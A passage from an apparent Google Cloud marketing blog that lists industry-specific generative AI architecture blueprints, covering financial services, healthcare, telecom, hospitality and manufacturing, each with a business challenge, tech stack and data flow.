Blueprint: Your entire product catalog and customer interaction history are indexed from BigQuery into Vertex AI Agent Builder. ➝ When a customer interacts with the chat assistant on your website, their query is sent to a service on Cloud Run. ➝ The service uses the Agent Builder to understand the user’s intent and retrieve relevant product information. ➝ For complex or conversational queries, the retrieved information is passed to Gemini with a prompt like, “A customer is asking for a durable, family-friendly car. Based on these three models, explain which is the best fit and why.” ➝ Gemini generates a helpful, conversational response that guides the customer to the right product, increasing conversion.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud infrastructure’), (‘body’, <wagtail.rich_text.RichText object at 0x3e54089622b0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

101+GenAI_Blog_Header_004-Financial-Services

These architectural blueprints are inspired by customers who are using AI in the financial services industry, such as: Bud Financial, Deutsche Bank, Discover Financial, Scotiabank, and more.

32. Automate banking tasks with a financial LLM

Business challenge: You’re a neobank or financial institution serving a digitally native customer base. Your challenge is that customers expect intelligent and proactive service that traditional banking workflows can’t provide, such as automatically preventing an overdraft.
Tech stack: Vertex AI, Cloud Functions, Pub/Sub, BigQuery.
Blueprint: Real-time transaction data streams into Pub/Sub and is analyzed by a Cloud Function ➝ If a potential overdraft is detected, the function calls a fine-tuned Gemini model (a Financial LLM) with a prompt like, “This user is about to overdraft. Based on their account history, suggest the best action.” ➝ Gemini might respond with, “Move $50 from their ‘Savings’ account.” ➝ The system can then either automatically execute the transfer or send a proactive notification to the user, preventing the fee and improving their financial health.

33. Create an AI mortgage agent to personalize quotes

Business challenge: You’re a digital mortgage lender in a highly competitive market. Your challenge is that potential borrowers are often comparison shopping and will abandon your site if they can’t get a fast, clear, and personalized rate quote without a lengthy application process.
Tech stack: Vertex AI, Cloud Run, a secure document store (e.g., Cloud Storage).
Blueprint: A borrower uses a feature like “Beat this Rate” and uploads a competitor’s quote sheet to Cloud Storage. ➝ The document is sent to a service on Cloud Run, which calls a multimodal Gemini model. ➝ Gemini extracts the key terms (rate, points, term length) from the document. ➝ The service uses this data to query internal rate tables and constructs a new prompt for Gemini, such as “Create a comparison table and a friendly chat message showing how our 2.95% rate is better than this competitor’s 3.15% rate.” ➝ The personalized quote and comparison are displayed to the borrower in seconds.

34. Build an AI agent to enhance wealth management advisory

Business challenge: You’re a wealth management firm where financial advisors spend significant time on administrative tasks like writing call summaries. Your challenge is freeing up advisors from this manual work so they can focus on high-value client relationship building and strategic advice.
Tech stack: Speech-to-Text API, Vertex AI, a CRM system.
Blueprint: During a client call, the audio is transcribed in real-time by the Speech-to-Text API. ➝ After the call, the full transcript is sent to a Gemini model with a prompt like, “Summarize this financial advisory call. Identify key client concerns, action items for the advisor, and update the client’s financial goals.” ➝ Gemini generates a structured summary and a list of action items. ➝ This summary is automatically logged into the firm’s CRM system, saving the advisor significant time and ensuring a consistent record of every interaction.

35. Accelerate underwriting with AI-powered document analysis

Business challenge: You’re a mortgage lender or broker dealing with thousands of loan applications. Your challenge is the slow, manual process of underwriting, where humans must read through complex financial documents, leading to long closing times and high operational costs.
Tech stack: Document AI, Vertex AI, BigQuery, Cloud Run.
Blueprint: A broker uploads a borrower’s financial documents (pay stubs, bank statements) to a portal. ➝ A service on Cloud Run sends the documents to Document AI to extract and structure all the raw data (income, assets, debts). ➝ The structured data is stored in BigQuery and sent to a Gemini model with a prompt like, “Analyze this borrower’s financial data against our underwriting guidelines and flag any potential risks.” ➝ The model returns a risk analysis, allowing a human underwriter to make a final decision in minutes instead of hours, dramatically increasing productivity.

36. Automate international transfers via a chat interface

Business challenge: You’re a financial institution specializing in currency exchange. Initiating international transfers often requires customers to navigate complex online forms or visit a branch during business hours, creating a slow and inconvenient experience.
Tech stack: A chat platform API, Dialogflow CX (or Vertex AI Conversation), Cloud Functions.
Blueprint: A customer starts a conversation and says, “I want to send $500 to my brother in the UK.” ➝ The message is sent to a Dialogflow CX agent, which is trained to handle transfer requests. ➝ The agent asks clarifying questions (e.g., “What is the recipient’s bank information?”). ➝ Once all the necessary information is collected, Dialogflow calls a secure Cloud Function. ➝ The Cloud Function executes the transfer via the bank’s core systems and sends a confirmation message back to the customer through the chat interface, completing the entire transaction 24/7 without human intervention.

37. Build an AI research assistant for financial analysts

Business challenge: You’re a financial institution where analysts spend hours, or even days, gathering data and synthesizing information to produce research reports. Your challenge is accelerating this process to deliver more timely insights to clients while maintaining the highest standards of data privacy.
Tech stack: Vertex AI, BigQuery.
Blueprint: A financial analyst uses an internal research tool and gives it a prompt like, “Draft a research note on the semiconductor industry’s Q3 performance, focusing on supply chain trends and key player earnings.” ➝ The tool queries internal, proprietary datasets in BigQuery and external, approved market data sources using Vertex AI Search. ➝ The retrieved data is passed to a Gemini model with a detailed prompt to generate a draft report. ➝ The model produces a structured draft with key insights, charts, and summaries, allowing the analyst to refine and finalize the report in minutes instead of days.

38. Automate insurance claims processing with multimodal AI

Business challenge: You’re an insurance provider, and your claims process relies on adjustors manually reviewing various documents (photos, repair estimates, police reports). This is slow, error-prone, and leads to a poor customer experience during a stressful time.
Tech stack: Document AI, Vertex AI, Cloud Run.
Blueprint: A claimant uploads all their documents and photos for a claim. ➝ A service on Cloud Run sends text documents to Document AI and images to Vertex AI Vision to extract and structure all relevant information. ➝ This structured data is then passed to a Gemini model with a prompt like, “Based on this police report, repair estimate, and photos of the damage, is this auto claim valid under policy #12345? Calculate the estimated payout.” ➝ The model returns a validation decision and payout amount, allowing simple claims to be settled in near real-time.

39. Build an AI agent to extract data from legal documents

Business challenge: You’re a financial advisory or wealth management firm. Your challenge is the time-consuming and highly manual process of reading through lengthy, complex legal documents like wills and trusts to extract key information for estate planning.
Tech stack: Document AI, Vertex AI.
Blueprint: A financial advisor uploads a client’s lengthy trust document (a PDF). ➝ The document is processed by Document AI to extract all the raw text while preserving its structure. ➝ The extracted text is then sent to a fine-tuned Gemini model with a prompt like, “From this trust document, extract the beneficiaries, trustees, asset distribution rules, and any specific conditions for inheritance.” ➝ The model returns the key information in a structured format (like JSON), which can be used to automatically populate the client’s profile in the planning platform, saving the advisor hours of manual reading.

40. Automate software bug ticket-to-code generation

Business challenge: You’re a software company in a regulated industry, and your developers spend significant time translating bug reports or feature requests from project management tickets into actual code, slowing down the development cycle.
Tech stack: Vertex AI, a project management tool API (e.g., Jira).
Blueprint: When a new bug ticket is created in Jira, a webhook triggers a service. ➝ The service retrieves the ticket’s description, which details the bug (e.g., “The ‘export’ button is not working on the user dashboard for accounts in ‘pending’ status.”). ➝ This description is used to construct a detailed prompt for Gemini Code Assist, which has been trained on the company’s private codebase. ➝ The prompt is, “Given our codebase, write the Python code to fix the bug described in this ticket.” ➝ The model generates a code snippet or a pull request with the suggested fix, which a developer can then review, test, and merge, significantly speeding up the process.

41. Build an anti-fraud and credit analysis engine

Business challenge: You’re a fintech company providing payment solutions or loans. Your challenge is accurately assessing credit risk and detecting fraudulent transactions in real-time to protect both your business and your customers, without slowing down the user experience.
Tech stack: BigQuery, Vertex AI, Dataflow.
Blueprint: Real-time transaction and user behavior data streams through Dataflow and is stored in BigQuery. ➝ Vertex AI machine learning models are continuously trained on this historical data to learn the patterns of both legitimate and fraudulent activity. ➝ When a new transaction occurs, the data is sent to the deployed fraud detection model in real-time. ➝ The model returns a risk score in milliseconds. ➝ If the score is high, the transaction can be automatically blocked or flagged for manual review, preventing fraud before it happens.

101+GenAI_Blog_Header_005-Healthcare-&-Life-Sciences

These architectural blueprints are inspired by customers who are using AI in the healthcare and life sciences industry, such as: Bayer, Mayo Clinic, Clivi, Orby, Hackensack Meridian Health, and more.

42. Enable personalized and continuous patient monitoring

Business challenge: You’re a healthcare provider managing a large population of patients with chronic conditions like diabetes. Your challenge is that periodic check-ins don’t provide a complete picture of a patient’s health, making it difficult to offer timely, personalized advice or intervene before complications arise.
Tech stack: IoT devices (or mobile app), Pub/Sub, Dataflow, BigQuery, Vertex AI.
Blueprint: Real-time patient data from sources like glucose monitors is streamed to Pub/Sub ➝ A Dataflow pipeline processes and normalizes the data, storing it in BigQuery against the patient’s record ➝ The system uses a Vertex AI model to analyze trends, and if an anomaly is detected (e.g., consistently high blood sugar), it triggers an alert ➝ Gemini then generates a personalized message for the patient, like “We’ve noticed your glucose levels have been high in the evenings. Try a short walk after dinner and let’s see how your numbers look tomorrow.”

43. Build an AI assistant for radiology workflows

Business challenge: You’re a healthcare provider, and your radiologists are facing immense pressure from increasing workloads. Your challenge is helping them analyze complex images, search for relevant prior studies, and create regulatory-compliant reports more efficiently and accurately.
Tech stack: Vertex AI, Google Cloud Healthcare API, PACS system.
Blueprint: A new radiology image is ingested and de-identified via the Healthcare API and stored in a PACS. ➝ The image is sent to a Vertex AI vision model to detect and highlight potential areas of interest ➝ A radiologist can use Vertex AI Search, which is indexed on millions of prior anonymized studies, to find similar cases ➝ After review, the radiologist dictates their findings, and Gemini helps draft a structured, compliant report, which is then finalized and logged, freeing up the radiologist to focus on complex diagnostic work.

44. Create a virtual assistant for caregiver shift handoffs

Business challenge: You’re a large healthcare network, and a critical point of failure is the shift change between nurses or caregivers. Your challenge is ensuring that crucial context and patient status details are not lost during this handoff, which can impact the continuity and quality of care.
Tech stack: Speech-to-Text API, Vertex AI, an Electronic Health Record (EHR) system.
Blueprint: As a nurse ends their shift, they speak into a device and summarize their patient’s status. ➝ Speech-to-Text transcribes their summary in real-time. ➝ The transcript is sent to Gemini with a prompt like, “Convert this unstructured shift summary into a structured report with sections for ‘Vitals’, ‘Medication Administered’, ‘Patient Observations’, and ‘Action Items for Next Shift’.” ➝ The structured summary is automatically placed in the patient’s EHR, allowing the incoming caregiver to get a complete and consistent overview in seconds. For a more detailed example, check out this blog.

45. Accelerate drug discovery with generative protein design

Business challenge: You’re a biotech or pharmaceutical company, and the traditional process of drug discovery is incredibly slow and expensive. Your challenge is finding a way to rapidly design and test novel proteins that could become the basis for new medicines.
Tech stack: Vertex AI, Google Cloud TPUs.
Blueprint: Scientists input the desired properties of a protein (e.g., “Design a protein that binds to target X to inhibit its function”). ➝ This request is sent to a generative AI model running on high-performance TPUs on Google Cloud. ➝ The model, trained on vast biological datasets, generates sequences for thousands of novel proteins that meet the specified criteria. ➝ These AI-designed proteins can then be synthesized and tested in the lab, drastically shortening the initial R&D phase from years to weeks.

46. Automate pharmaceutical documentation and formatting

Business challenge: You’re a pharmaceutical company that deals with a high volume of complex documents, from lab results to FDA compliance paperwork. Your challenge is the time-consuming, manual process of transcribing, formatting, and summarizing this information, which slows down operations.
Tech stack: Gemini for Google Workspace, Document AI.
Blueprint: A lab result arrives as a PDF attachment in an employee’s inbox. ➝ The employee uses Gemini in Gmail with a prompt like, “Extract the key values from this attached lab result and format them into the standard table in this Google Doc template.” ➝ Gemini leverages Document AI capabilities to parse the PDF, extract the structured data, and populate the Google Doc. ➝ This reduces a multi-step manual process into a single command, saving hours per week.

47. Build an AI-enhanced underwriting model for insurers

Business challenge: You’re a commercial insurer, and quoting policies for complex risks requires underwriters to manually assess vast amounts of data, a process that can take days. Your challenge is to automate and accelerate this process to provide faster quotes and gain a competitive edge.
Tech stack: BigQuery, Vertex AI, Cloud Run.
Blueprint: Historical data on leads, quotes, and claims outcomes is stored and processed in BigQuery. ➝ This data is used to train a Vertex AI machine learning model to predict the risk associated with a new lead. ➝ When a new request for a quote arrives, the data is sent to a service on Cloud Run. ➝ The service calls the deployed Vertex AI model, which returns a risk score and a suggested premium in seconds. ➝ This automates the initial assessment, allowing a human underwriter to review the AI-generated quote and make a final decision in minutes instead of days.

48. Build an intelligent search platform for clinical research

Business challenge: You’re a large research hospital or institution with petabytes of valuable clinical data. Your challenge is that this data is often siloed and difficult for researchers to access and analyze, creating a major roadblock to scientific discovery.
Tech stack: Vertex AI Search, BigQuery, Google Cloud Healthcare API.
Blueprint: Petabytes of clinical data are de-identified using the Healthcare API and consolidated into BigQuery. ➝ The entire dataset, including unstructured notes and structured data, is indexed into Vertex AI Search. ➝ A researcher can now use a simple, natural language search bar to ask complex questions like, “Find all patient cohorts over the age of 50 with a history of heart disease who responded positively to drug X.” ➝ Vertex AI Search retrieves the relevant, anonymized records from across the entire 50-petabyte dataset, accelerating research from months to minutes.

49. Predict disease outbreaks with public and private data

Business challenge: You’re a pharmaceutical company or public health organization. Your challenge is to move from reacting to seasonal outbreaks like the flu to proactively predicting them, allowing for better resource planning, vaccine distribution, and public health messaging.
Tech stack: BigQuery, Vertex AI, Google Trends API.
Blueprint: Anonymized, aggregated Google Search trend data (via the Trends API) for terms like “fever” and “cough” is combined with internal historical sales data for flu medication in BigQuery. ➝ A Gemini model is used to analyze these combined datasets to identify correlations and predict future outbreaks on a location-specific basis. ➝ The system generates a forecast, such as “A 20% increase in search traffic for ‘flu symptoms’ in Ohio predicts a spike in cases in 7-10 days.”, which is then visualized on a dashboard for real-time healthcare planning.

50. Enhance IVF outcomes with AI-powered embryo analysis

Business challenge: You’re a fertility clinic, and one of the most critical and difficult parts of the IVF process is selecting the embryo with the highest chance of a successful pregnancy. Your challenge is improving the accuracy of this selection process to give patients the best possible outcomes.
Tech stack: Vertex AI, Google Cloud Storage.
Blueprint: High-resolution images of embryos are uploaded to Google Cloud Storage. ➝ A Vertex AI Vision model analyzes the images, extracting hundreds of morphological features that are imperceptible to the human eye. ➝ This feature data, along with the eventual outcome data (successful implantation or not), is used to train an AutoML model. ➝ When analyzing a new patient’s embryos, the model provides a viability score for each one, helping embryologists make a more data-driven decision and increasing the likelihood of a successful IVF cycle.

51. Automate routing and medical order processing for home health

Business challenge: You’re a home health company managing a fleet of nurses who conduct thousands of patient visits. Your challenge is optimizing their daily routes to be as efficient as possible while also speeding up the manual, paper-based process of handling medical orders.
Tech stack: Google Maps Platform (Routes API), Document AI, Cloud Run.
Blueprint: A patient’s medical order (PDF or image) is uploaded to the system. ➝ A service on Cloud Run sends the file to Document AI, which automatically extracts the patient details, required services, and location. ➝ Each day, the system sends the list of all required visits to the Google Maps Routes API, which calculates the most efficient multi-stop route for each nurse. ➝ The optimized route is sent to the nurse’s mobile app, saving time and fuel, while the automated order processing reduces administrative overhead.

101+GenAI_Blog_Header_006-Telecommunication

These architectural blueprints are inspired by customers who are using AI in the telecommunication industry, such as: Bell Canada, Verizon, Vodafone, Nokia, Orange, and more.

52. Build a customizable AI contact center solution

Business challenge: You’re a telecommunications provider serving business customers who need to modernize their own customer service. Your challenge is providing a flexible, AI-powered contact center solution that can both handle calls automatically and assist human agents in real-time.
Tech stack: Contact Center AI Platform (CCAI), Vertex AI, a CRM system.
Blueprint: When a customer calls, they are first greeted by an AI-powered agent built on Contact Center AI. ➝ The agent handles common requests, such as checking an account balance. ➝ If the caller needs to speak to a human, the call is transferred. ➝ As the human agent speaks, the “Agent Assist” feature listens to the conversation, transcribes it in real-time, and uses Gemini to provide the agent with relevant knowledge base articles and next-step suggestions directly in their CRM interface.

53. Empower your workforce with generative AI tools

Business challenge: You’re a large telecommunications company, and you want to empower your entire workforce with AI. Your challenge is providing easy access to generative AI tools while maintaining strict security, privacy, and compliance controls over your sensitive company data.
Tech stack: Vertex AI, Identity and Access Management (IAM), Google Cloud Storage.
Blueprint: An internal “AI Sandbox” platform is built using Vertex AI Agent Builder. ➝ The platform is grounded on a curated set of internal company documents (legal, HR, technical docs) stored securely in Google Cloud Storage. ➝ Employees access the sandbox through their corporate identity, with IAM rules ensuring they can only access data they are permissioned to see. ➝ An employee can then ask questions like “Summarize our new data privacy policy” and receive an answer from Gemini that is based solely on the trusted internal documents, democratizing information securely.

54. Automate call summarization and quality assurance

Business challenge: You’re a telecom operator with a large customer service center. Your challenge is ensuring consistent quality and identifying best practices from thousands of daily calls, a task that requires managers to manually listen to a small, random sample of call recordings.
Tech stack: Speech-to-Text API, Vertex AI, BigQuery, Looker.
Blueprint: Audio from all customer service calls is transcribed by the Speech-to-Text API, and the text is stored in BigQuery. ➝ A scheduled job sends the transcripts to Gemini with a prompt like, “Summarize this call, classify the customer’s reason for calling, and rate the agent’s effectiveness based on our quality rubric.” ➝ The structured analysis is written back to BigQuery. ➝ Managers use a Looker dashboard to see trends, identify top-performing agents, and find calls that can be used as examples for team training.

55. Use AI to analyze complex commercial contracts

Business challenge: You’re a global telecommunications operator with thousands of complex interconnection agreements and vendor contracts. Your challenge is quickly finding specific commercial terms, obligations, or renewal dates buried within these dense legal documents.
Tech stack: Document AI, Vertex AI Search, Vertex AI.
Blueprint: Thousands of contracts are processed by Document AI to extract and structure the raw text, which is then indexed into Vertex AI Search. ➝ A member of the legal or commercial team uses a search interface and asks a natural language question like, “Find all contracts with Operator X that have a termination clause requiring 90 days’ notice.” ➝ Vertex AI Search retrieves the relevant contract sections. ➝ For further analysis, Gemini can be used to compare terms across multiple retrieved documents in a side-by-side table.

56. Build a “network as code” platform for developers

Business challenge: You’re a 5G network operator, and you want to enable developers to create innovative applications that leverage the unique capabilities of your network (e.g., low latency, high bandwidth). Your challenge is abstracting the complexity of the network into simple, programmable APIs.
Tech stack: Vertex AI, Google Kubernetes Engine (GKE), network APIs.
Blueprint: A “Network as Code” platform exposes complex network functions via simple APIs, hosted on GKE. ➝ A developer wants to build a telehealth app that requires a guaranteed high-quality connection for a remote surgery consultation. ➝ They use the platform’s SDK and interact with a Gemini-powered assistant, prompting, “Generate the Python code to request a dedicated, low-latency network slice between the hospital and the patient’s home for the next 60 minutes.” ➝ Gemini generates the necessary code, which calls the platform’s APIs to provision the network resources dynamically.

57. Create a unified customer view for enhanced service

Business challenge: You’re a large telecom provider, and your customer data is fragmented across multiple systems (billing, CRM, network usage). Your challenge is creating a single, 360-degree view of each customer to provide proactive, personalized service and make informed business decisions.
Tech stack: BigQuery, Dataflow, Vertex AI, Looker.
Blueprint: Data from all source systems is streamed via Dataflow into BigQuery, which acts as the central data warehouse. ➝ Vertex AI models analyze the unified data to identify patterns, such as a customer experiencing poor network quality in a specific location. ➝ The system can then create an actionable insight, like “This customer is at high risk of churn due to repeated dropped calls.” ➝ This insight is surfaced to a customer service agent via a Looker dashboard, prompting them to proactively reach out with a solution, like offering a network extender.

58. Enable natural language chat for complex IoT data

Business challenge: You’re an Internet of Things (IoT) provider for commercial clients, collecting millions of data points from sensors and devices. Your challenge is that non-technical users, like fleet managers or building operators, cannot easily access or understand this complex data to get the insights they need.
Tech stack: BigQuery, Vertex AI, Looker (or another BI tool).
Blueprint: All IoT data is streamed and stored in BigQuery. ➝ The data is exposed through a BI tool like Looker with an embedded natural language chat interface. ➝ A non-technical user asks a question in plain English, such as “Which of our vehicles have been idling for more than 30 minutes today in the downtown area?” ➝ The request is sent to Gemini, which understands the user’s intent and translates the question into a SQL query. ➝ The query is run against BigQuery, and the results are returned as a simple table or map directly in the chat interface, reducing time-to-insight by 88%.

59. Deliver AI services on a distributed cloud for data sovereignty

Business challenge: You’re a multinational telecom operator serving countries with strict data residency laws. Your challenge is to leverage powerful AI capabilities, like real-time translation, while ensuring that local customer data never leaves the country of origin.
Tech stack: Google Distributed Cloud, Vertex AI, Speech-to-Text, Text-to-Speech.
Blueprint: An instance of Google Distributed Cloud (GDC) is deployed within the local country’s data center. ➝ A user makes a call that requires real-time translation. ➝ The audio stream is processed entirely within the GDC environment. ➝ Speech-to-Text and Text-to-Speech services, along with Vertex AI translation models running on GDC, handle the translation. ➝ The translated audio is sent back to the user with super-low latency, delivering the AI service while guaranteeing all data remains in-country to comply with sovereignty regulations.

60. Accelerate cybersecurity threat detection and response

Business challenge: You’re a critical infrastructure provider, and you face a constant barrage of sophisticated cyber threats. Your challenge is detecting and investigating these threats fast enough to prevent breaches, a task that is difficult for human analysts to manage at scale.
Tech stack: Google Security Operations (SecOps), Gemini in Security.
Blueprint: Security logs and telemetry from across the entire organization are ingested into the Google Security Operations platform. ➝ The platform’s AI capabilities automatically correlate signals to detect potential threats that a human might miss. ➝ When a high-priority event is detected, a security analyst can use the integrated Gemini in Security to ask, “Summarize this threat. What is the potential impact, and what is the recommended remediation?” ➝ Gemini provides a concise summary and a step-by-step playbook, allowing the analyst to close investigations faster.

61. Establish data-driven AI security governance

Business challenge: You’re a large enterprise with thousands of internal developers and data scientists building AI models. Your challenge is establishing a robust governance layer to ensure that all AI development is secure, compliant, and data-driven without stifling innovation.
Tech stack: Vertex AI, BigQuery, open-source tools (e.g., for model scanning), IAM.
Blueprint: All AI model development is done within Vertex AI. ➝ As models are built, their metadata, training data sources, and dependencies are automatically logged in BigQuery. ➝ Automated security tools scan models for vulnerabilities. ➝ A governance dashboard provides a single view of all AI projects, showing compliance status and data lineage. ➝ IAM policies enforce rules, such as “a model cannot be deployed to production if it was trained on unapproved customer data,” creating a robust, data-driven governance framework.

101+GenAI_Blog_Header_007-Hospitality-&-Travel

These architectural blueprints are inspired by customers who are using AI in the hospitality and travel industry, such as: Alaska Airlines, Gymshark, Priceline, Six Flags, Studiosus Reisen, trivago, and more.

62. Build a conversational AI travel agent

Business challenge: You’re an airline or online travel agency. Your challenge is that traditional booking websites with complex filters and forms can be frustrating and impersonal for travelers who just want to ask a simple question, leading to abandoned searches and lost bookings.
Tech stack: Vertex AI, Cloud Run, backend booking system APIs.
Blueprint: A traveler interacts with a chatbot on the website or app, asking, “I want to fly from Seattle to Miami next month for about $400.” ➝ The request is sent to a service on Cloud Run, which uses Vertex AI Agent Builder to understand the user’s intent and extract entities (origin, destination, date, price). ➝ The service calls the airline’s booking APIs to find matching flights. ➝ The flight options are passed to Gemini with a prompt like, “Here are three flights. Present them in a friendly, conversational way and ask the user which one they prefer.” ➝ The chatbot presents the options, streamlining the booking process into a simple conversation.

63. Create an in-park digital assistant for theme parks

Business challenge: You’re a theme park or large entertainment venue operator. Your challenge is that guests can feel overwhelmed trying to navigate the park, find showtimes, and check ride wait times, which can detract from their overall experience.
Tech stack: Google Maps Platform, Vertex AI, BigQuery, Cloud Run.
Blueprint: Real-time park data (ride wait times, show schedules, character locations) is streamed into BigQuery. ➝ A guest opens the park’s mobile app and asks the digital assistant, “What’s a fun ride with a wait time under 20 minutes near me?” ➝ The app sends the request and the user’s location to a service on Cloud Run. ➝ The service queries BigQuery for current wait times and uses the Google Maps Platform to find nearby attractions. ➝ Gemini synthesizes this information to provide a personalized recommendation, such as, “The Goliath roller coaster is a 5-minute walk from you and has a 15-minute wait!”

64. Build predictive tools for food orders and loyalty

Business challenge: You’re a quick-service restaurant or pizza chain. Your challenge is managing inventory and kitchen prep time effectively during peak hours while also encouraging repeat business through generic loyalty programs that often fail to engage customers.
Tech stack: BigQuery, Vertex AI, Cloud Run.
Blueprint: All historical order data is stored in BigQuery. ➝ Vertex AI forecasting models analyze this data to predict order volumes for specific times and locations (e.g., “Predict a 30% spike in pepperoni pizza orders in downtown locations on Friday night”). ➝ When a loyalty member opens the app, a service on Cloud Run retrieves their order history and sends it to Gemini with a prompt like, “This user frequently orders on Tuesdays. Create a personalized offer for a free side item with their next Tuesday order.” ➝ This predictive prep and personalized marketing increases efficiency and customer loyalty.

65. Enable natural language search for accommodations

Business challenge: You’re a hotel booking platform or vacation rental site. Your challenge is that users often have specific, nuanced needs (like “a quiet hotel near the beach with a pool for kids”) that are difficult to express using standard check-box filters.
Tech stack: Vertex AI Search, BigQuery.
Blueprint: Detailed data for millions of hotel listings, including amenities, reviews, and location info, is indexed from BigQuery into Vertex AI Search. ➝ A user types a free-text query like, “Find me a pet-friendly hotel in downtown Austin with a rooftop bar for under $300 a night.” ➝ Vertex AI Search processes the natural language to understand the multiple intents (pet-friendly, location, amenity, price). ➝ The engine returns a ranked list of hotels that best match all the specified criteria, creating a more intuitive and personalized search experience.

66. Create an AI-driven virtual fitness coach

Business challenge: You’re a fitness brand or gym, and your customers want personalized training plans. Your challenge is that providing one-on-one human coaching is expensive and doesn’t scale, leaving most members with generic, one-size-fits-all workout programs.
Tech stack: Vertex AI, a mobile application, wearable device integration.
Blueprint: A user inputs their fitness goals and performs a series of assessment exercises, which are recorded through their phone’s camera. ➝ A computer vision model on Vertex AI analyzes the video to assess form and fitness level. ➝ This data, along with input from their wearable device, is sent to a Gemini model with a prompt like, “Create a 4-week progressive fitness program for a user with intermediate strength whose goal is fat loss.” ➝ The AI generates a hyper-personalized daily workout program, acting as a virtual trainer that adapts over time based on the user’s performance.

67. Personalize advertising campaigns at scale

Business challenge: You’re a global hotel group, and you need to run advertising campaigns across many different regions and customer segments. Your challenge is creating ad copy and imagery that resonates with each specific audience, a task that is slow and difficult to scale manually.
Tech stack: BigQuery, Vertex AI, Google Ads API.
Blueprint: Customer and campaign performance data is consolidated in BigQuery. ➝ The marketing team defines a new campaign with a target audience, such as “families looking for a summer vacation in Spain.” ➝ A service sends this context to Gemini with a prompt like, “Generate 5 different ad headlines and descriptions for a family-friendly hotel in Barcelona, highlighting the pool and proximity to attractions.” ➝ Gemini creates multiple ad variations, which are then automatically pushed to the Google Ads API to create a highly targeted and personalized campaign, boosting ad team productivity and revenue.

68. Automate data governance for airline operations

Business challenge: You’re a major airline dealing with petabytes of data from dozens of systems, from flight operations to customer loyalty. Your challenge is managing and governing this data, as manually classifying tables and managing metadata is a massive, costly, and error-prone undertaking.
Tech stack: BigQuery, Gemini, Dataplex.
Blueprint: As new data tables are created in BigQuery, a process is triggered. ➝ The table schema and sample data are sent to a Gemini model with a prompt like, “Analyze this table and generate a business-friendly description, assign data quality rules, and classify any columns that contain PII.” ➝ The model returns structured metadata. ➝ This metadata is used to automatically populate the Dataplex data catalog, ensuring all data is properly documented, classified, and governed without significant manual effort.

69. Automatically classify real-time traveler security alerts

Business challenge: You’re a tour operator responsible for the safety of thousands of travelers around the world. Your challenge is monitoring and filtering a high volume of global security alerts to identify the ones that pose an actual, immediate risk to your specific customers.
Tech stack: Vertex AI, Pub/Sub, a traveler itinerary database.
Blueprint: A stream of global security alerts from various news and government sources flows into Pub/Sub. ➝ For each alert, a function is triggered that retrieves the location and topic. ➝ The function queries the itinerary database to see if any travelers are currently in the affected area. ➝ If there are, the alert text is sent to Gemini with a prompt like, “Based on this alert about a protest in Paris, classify the risk level for a tourist located 5 miles away as ‘Low’, ‘Medium’, or ‘High’.” ➝ The classified alert appears on a security dashboard, allowing the team to ignore low-risk noise and focus only on credible threats, reducing manual effort.

70. Streamline guest services with an AI data analyst

Business challenge: You’re a property manager for vacation rentals or corporate housing. Your challenge is that new arrivals frequently call with the same set of questions (e.g., “What’s the wifi password?”, “How does the thermostat work?”), overwhelming your support staff.
Tech stack: Gemini for Google Workspace, a call logging system.
Blueprint: All support call logs and transcripts are consolidated into a central Google Sheet. ➝ A manager uses the integrated Gemini feature with a prompt like, “Analyze all the calls from the last 30 days and identify the top 5 most common questions asked by new arrivals.” ➝ Gemini analyzes the text and returns a summary, revealing that “Wifi password” is the most common issue. ➝ The business can then take proactive steps, like sending a more prominent welcome email with the wifi details, leading to a reduction in these repetitive calls.

71. Generate AI-powered video ad content

Business challenge: You’re an airline’s marketing team, and you need a constant stream of fresh video content to promote various destinations for in-flight entertainment and online ads. Your challenge is that traditional video production is expensive and time-consuming.
Tech stack: Google’s Veo, Vertex AI.
Blueprint: The marketing team identifies a destination to promote, for example, “Kyoto in autumn.” ➝ They use Gemini to brainstorm concepts and generate a script, with a prompt like, “Create a 30-second video script about the serene beauty of Kyoto’s temples during autumn.” ➝ This script, along with reference images and style guides, is then fed into Veo, Google’s generative video model. ➝ Veo generates a high-quality video clip based on the text and image prompts, allowing the team to create new, compelling ad content in a fraction of the time and cost of a traditional film shoot.

101+GenAI_Blog_Header_008-Manufacturing-Industrial-&-Electronics

These architectural blueprints are inspired by customers who are using AI in the manufacturing, industrial and electronics industry, such as: Motorola, AES, Broadcom, COI Energy, Bayer Crop Science, and more.

72. Build a better, more responsive AI home companion robot

Business challenge: You’re a consumer electronics manufacturer looking to create a next-generation smart home product. Your challenge is moving beyond simple voice commands to create a truly helpful home companion that can understand natural conversation and interact intelligently with its environment.
Tech stack: Vertex AI, on-device AI models, Home API
Blueprint: The home robot (“Max”) uses on-device microphones to capture a user’s command via the Speech-to-Text API. ➝ The user’s request is sent to a Gemini model, which understands the conversational context and intent. ➝ If the request is to control a smart home device (e.g., “turn on the living room lights”), Gemini sends the appropriate command to the Google Home Platform APIs. ➝ Gemini generates a natural language response (e.g., “Okay, I’ve turned the lights on for you.”), which is converted to audio via the Text-to-Speech API and played through the robot’s speakers.

73. Create an AI-powered product recommendation agent

Business challenge: You’re a manufacturer of consumer products with a wide and varied catalog, like gardening supplies. Your challenge is that customers are often novices and don’t know which specific product is right for their needs, leading to confusion and lost sales.
Tech stack: Vertex AI, BigQuery, Cloud Run.
Blueprint: Your entire product catalog, along with expert knowledge and guides, is indexed into Vertex AI Agent Builder from a source like BigQuery. ➝ A customer interacts with the AI agent on your website, asking, “My lawn has brown patches and I live in Texas. What should I do?” ➝ The agent understands the user’s intent and location. ➝ The retrieved product information and user query are sent to Gemini to generate a helpful, step-by-step answer, such as “It sounds like you have a grub problem, common in Texas this time of year. I recommend our product, and here’s how to apply it…”, guiding the customer to the correct purchase.

74. Automate industrial safety audits with AI

Business challenge: You’re a global energy or manufacturing company, and conducting safety audits across dozens of facilities is a slow, manual, and expensive process. Your challenge is to streamline these audits to ensure compliance and safety without incurring massive costs and operational downtime.
Tech stack: Vertex AI, Google Cloud Storage, a mobile application.
Blueprint: An auditor on-site uses a mobile app to take photos and videos of equipment, which are uploaded to Google Cloud Storage. ➝ Vertex AI Vision analyzes the imagery to identify equipment and check for visual compliance (e.g., “is the safety guard in place?”). ➝ The visual data, along with text from checklists, is fed to a Gemini model that has been trained on the company’s safety protocols. ➝ The model automatically generates a complete audit report, flagging non-compliant items and citing the specific safety rule, reducing a two-week process to one hour.

75. Automate sales quotes for configurable products

